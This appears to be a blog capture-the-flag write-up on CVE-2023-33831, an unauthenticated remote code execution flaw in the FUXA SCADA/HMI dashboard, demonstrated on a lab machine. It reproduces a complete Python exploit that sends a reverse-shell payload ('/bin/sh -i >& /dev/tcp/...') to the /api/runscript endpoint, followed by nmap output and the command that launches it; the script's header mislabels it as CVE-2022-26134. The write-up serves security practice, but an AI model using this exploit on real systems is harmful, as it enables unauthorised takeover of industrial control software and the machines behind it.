May 9, 2024
ishsome Blog, Capture The Flag, CTF Write-ups, CVE

CVE-2023-33831

This vulnerability allowed remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods that can be scaled for remote code execution. The affected route is /api/runscript, where, it is possible to execute commands without authenticating through the code parameter via the POST method using the child_process module via the exec function.

FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. With FUXA you can create modern process visualizations with individual designs for your machines and real-time data display.

You can read more about it on GitHub.

This Python exploit on GitHub showcases how effortlessly this can be exploited to obtain root access on the machine. The Python script can be seen below:

# Exploit Title: FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186
# CVE: CVE-2022-26134
# https://github.com/rodolfomarianocy/

from argparse import RawTextHelpFormatter
import argparse, requests

def main(rhost, rport, lhost, lport):
    url = "http://"+rhost+":"+rport+"/api/runscript"
    payload = {
        "headers":
            {
                "normalizedNames":{},
                "lazyUpdate": "null"
            },
            "params":{
                "script":{
                    "parameters":[
                    {
                    "name":"ok",
                    "type":"tagid",
                    "value":""
                    }
                    ],
                    "mode":"",
                    "id":"",
                    "test":"true",
                    "name":"ok",
                    "outputId":"",
                    "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)
                }
            }
        }
    try:
        response = requests.post(url, json=payload)
    except requests.exceptions.ConnectionError:
        print("url connection error")

parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost', required=True)
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default="1881")
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost', required=True)
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport', required=True)
args=parser.parse_args()

main(args.rhost, args.rport, args.lhost, args.lport)

The script is fairly easy to run and it takes the following arguments:

  • The remote host IP address running FUXA V.1.1.13-1186
  • The port on which FUXA is running
  • The attacker machine’s IP
  • The attacker machine’s listening port

I am using a machine from OffSec’s Proving Grounds lab to demonstrate this vulnerbaility

We will need to scan for open ports on the machine to discover the port on which FUXA is running.

┌──(ishsome㉿kali)-[~/…/PG Machines/Practice/Linux/CVE-2023-33831]
└─$ nmap -p22,1881 192.168.168.35 -A -oN nmap/cve-2023-33831
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 18:25 CDT
Nmap scan report for 192.168.168.35
Host is up (0.052s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
1881/tcp open  http    Node.js Express framework
|_http-title: FUXA
|_http-cors: GET POST PUT DELETE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds

We can see that FUXA is running on port 1881. We have all the information we need to run our script now. Let’s run the script now and obtain a shell on the machine!

┌──(ishsome㉿kali)-[~/…/Practice/Linux/CVE-2023-33831/Unauthenticated-RCE-FUXA-CVE-2023-33831]
└─$ python3 CVE-2023-33831.py --rhost 192.168.168.35 --rport 1881 --lhost 192.168.45.234 --lport 80